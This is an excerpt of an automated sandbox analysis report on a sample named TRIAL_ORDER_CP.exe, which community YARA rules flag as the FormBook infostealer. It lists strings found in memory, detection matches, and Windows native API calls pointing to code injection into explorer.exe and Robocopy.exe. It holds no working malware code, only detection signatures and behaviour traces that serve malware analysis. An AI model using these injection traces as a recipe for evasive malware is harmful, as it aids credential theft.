        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1pycuu.img
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKPPN8.img
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywOab.img
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBph6Sm.img
        Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=6c321c39-81be-4f44-a39d-6068
        Source: explorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://people.com/jim-parsons-reprising-big-bang-theory-role-is-a-gift-exclusive-8647240
        Source: explorer.exe, 00000007.00000002.275197435549.000000000D413000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436256660.000000000D413000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wealthofgeeks.com/the-best-tv-anti-heroes/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000007.00000002.275198272389.000000000D5D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436916001.000000000D5D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EXE.15
        Source: explorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cbsnews.com/news/saying-goodbye-to-young-sheldon/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.energy.gov/energysaver/why-energy-efficiency-matters
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/e
        Source: explorer.exe, 00000007.00000002.275191203436.00000000094D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/eP
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/best-movies-now-on-netflix/ss-BB1qpNv8
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/the-28-most-dazzling-red-carpet-beauty-looks-ever/ss-AA
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/the-best-big-bang-theory-episode-of-all-time-according-
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/30-photos-of-super-nostalgic-things-that-ll-bring-ba
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/the-slow-and-steady-growth-of-trilobites/ar-AA1lcBT3
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/actress-malinda-williams-recognized-for-films-like-soul-fo
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/yogapilates/biden-admin-can-t-force-electric-vehicle-goals-robert-w
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/cleaning-and-organizing/the-common-household-ingredient-that-can
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/another-popular-ice-cream-brand-files-for-chapter-11-bankr
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/elon-musk-s-strange-new-rule-for-x-employees-could-cause-t
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/i-m-an-economist-here-s-my-prediction-for-the-housing-mar
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/police-warn-aggressive-water-buffalo-has-been-on-the-loose-for-
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/new-trump-indictment-loses-some-allegations-related-to-jan-6
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/eight-seconds-KD
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnlts
        Source: explorer.exe, 00000007.00000003.272792772276.00000000095B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/idle-mining-
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/rally-champion/cg-9pmdcq52j3hj
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/motorsports/travis-kelce-buys-an-ownership-stake-in-a-racehorse-nam
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/news/c
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjoiV2FzaGlu
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/maps/airqualitystation/in-Washington%2CDistrict-of-Columbia?loc=ey
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/maps/severeweather/in-Washington%2CDistrict-of-Columbia?loc=eyJsIj
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.paramountpressexpress.com/cbs-entertainment/releases/?view=109387-cbs-orders-new-comedy-
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://youtu.be/1uIizdaJhMI

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: TRIAL_ORDER_CP.exe
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B534E0 NtCreateMutant,LdrInitializeThunk,3_2_33B534E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_33B52B90
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_33B52BC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52A80 NtClose,LdrInitializeThunk,3_2_33B52A80
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_33B52EB0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_33B52D10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B54260 NtSetContextThread,3_2_33B54260
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B54570 NtSuspendThread,3_2_33B54570
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52B80 NtCreateKey,3_2_33B52B80
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52BE0 NtQueryVirtualMemory,3_2_33B52BE0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52B20 NtQueryInformationProcess,3_2_33B52B20
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52B10 NtAllocateVirtualMemory,3_2_33B52B10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52B00 NtQueryValueKey,3_2_33B52B00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52AA0 NtQueryInformationFile,3_2_33B52AA0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52AC0 NtEnumerateValueKey,3_2_33B52AC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52A10 NtWriteFile,3_2_33B52A10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B529F0 NtReadFile,3_2_33B529F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B529D0 NtWaitForSingleObject,3_2_33B529D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B538D0 NtGetContextThread,3_2_33B538D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52FB0 NtSetValueKey,3_2_33B52FB0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52F30 NtOpenDirectoryObject,3_2_33B52F30
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52F00 NtCreateFile,3_2_33B52F00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52E80 NtCreateProcessEx,3_2_33B52E80
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52ED0 NtResumeThread,3_2_33B52ED0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52EC0 NtQuerySection,3_2_33B52EC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52E00 NtQueueApcThread,3_2_33B52E00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52E50 NtCreateSection,3_2_33B52E50
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52DA0 NtReadVirtualMemory,3_2_33B52DA0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52DC0 NtAdjustPrivilegesToken,3_2_33B52DC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52D50 NtWriteVirtualMemory,3_2_33B52D50
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B53C90 NtOpenThread,3_2_33B53C90
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52CF0 NtDelayExecution,3_2_33B52CF0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52CD0 NtEnumerateKey,3_2_33B52CD0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52C30 NtMapViewOfSection,3_2_33B52C30
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B53C30 NtOpenProcessToken,3_2_33B53C30
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52C20 NtSetInformationFile,3_2_33B52C20
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52C10 NtOpenProcess,3_2_33B52C10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52C50 NtUnmapViewOfSection,3_2_33B52C50
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_04742877 SleepEx,NtResumeThread,5_2_04742877
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_047425F8 SleepEx,NtCreateSection,5_2_047425F8
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A34E0 NtCreateMutant,LdrInitializeThunk,6_2_045A34E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2C30 NtMapViewOfSection,LdrInitializeThunk,6_2_045A2C30
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2CF0 NtDelayExecution,LdrInitializeThunk,6_2_045A2CF0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2D10 NtQuerySystemInformation,LdrInitializeThunk,6_2_045A2D10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2E50 NtCreateSection,LdrInitializeThunk,6_2_045A2E50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2F00 NtCreateFile,LdrInitializeThunk,6_2_045A2F00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A29F0 NtReadFile,LdrInitializeThunk,6_2_045A29F0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2A80 NtClose,LdrInitializeThunk,6_2_045A2A80
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_045A2B10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2B00 NtQueryValueKey,LdrInitializeThunk,6_2_045A2B00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2BC0 NtQueryInformationToken,LdrInitializeThunk,6_2_045A2BC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2B90 NtFreeVirtualMemory,LdrInitializeThunk,6_2_045A2B90
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2B80 NtCreateKey,LdrInitializeThunk,6_2_045A2B80
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A4570 NtSuspendThread,6_2_045A4570
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A4260 NtSetContextThread,6_2_045A4260
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2C50 NtUnmapViewOfSection,6_2_045A2C50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2C10 NtOpenProcess,6_2_045A2C10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A3C30 NtOpenProcessToken,6_2_045A3C30
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2C20 NtSetInformationFile,6_2_045A2C20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2CD0 NtEnumerateKey,6_2_045A2CD0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A3C90 NtOpenThread,6_2_045A3C90
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2D50 NtWriteVirtualMemory,6_2_045A2D50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2DC0 NtAdjustPrivilegesToken,6_2_045A2DC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2DA0 NtReadVirtualMemory,6_2_045A2DA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2E00 NtQueueApcThread,6_2_045A2E00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2ED0 NtResumeThread,6_2_045A2ED0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2EC0 NtQuerySection,6_2_045A2EC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2E80 NtCreateProcessEx,6_2_045A2E80
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2EB0 NtProtectVirtualMemory,6_2_045A2EB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2F30 NtOpenDirectoryObject,6_2_045A2F30
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2FB0 NtSetValueKey,6_2_045A2FB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A38D0 NtGetContextThread,6_2_045A38D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A29D0 NtWaitForSingleObject,6_2_045A29D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2A10 NtWriteFile,6_2_045A2A10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2AC0 NtEnumerateValueKey,6_2_045A2AC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2AA0 NtQueryInformationFile,6_2_045A2AA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2B20 NtQueryInformationProcess,6_2_045A2B20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A2BE0 NtQueryVirtualMemory,6_2_045A2BE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488EFDA NtQueryInformationProcess,6_2_0488EFDA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04893C78 NtResumeThread,6_2_04893C78
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04893638 NtSetContextThread,6_2_04893638
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04893F98 NtQueueApcThread,6_2_04893F98
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488F99A NtClose,6_2_0488F99A
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04893958 NtSuspendThread,6_2_04893958
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_70681BFF0_2_70681BFF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B113803_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDF3303_2_33BDF330
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2E3103_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D2EC3_2_33B0D2EC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD124C3_2_33BD124C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B1E03_2_33B3B1E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B251C03_2_33B251C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD1303_2_33BBD130
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F1133_2_33B0F113
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE010E3_2_33BE010E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B6717A3_2_33B6717A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B100A03_2_33B100A0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B5508C3_2_33B5508C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD70F13_2_33BD70F1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2B0D03_2_33B2B0D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCE0763_2_33BCE076
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B227603_2_33B22760
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2A7603_2_33B2A760
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD67573_2_33BD6757
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B206803_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDF6F63_2_33BDF6F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1C6E03_2_33B1C6E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B936EC3_2_33B936EC
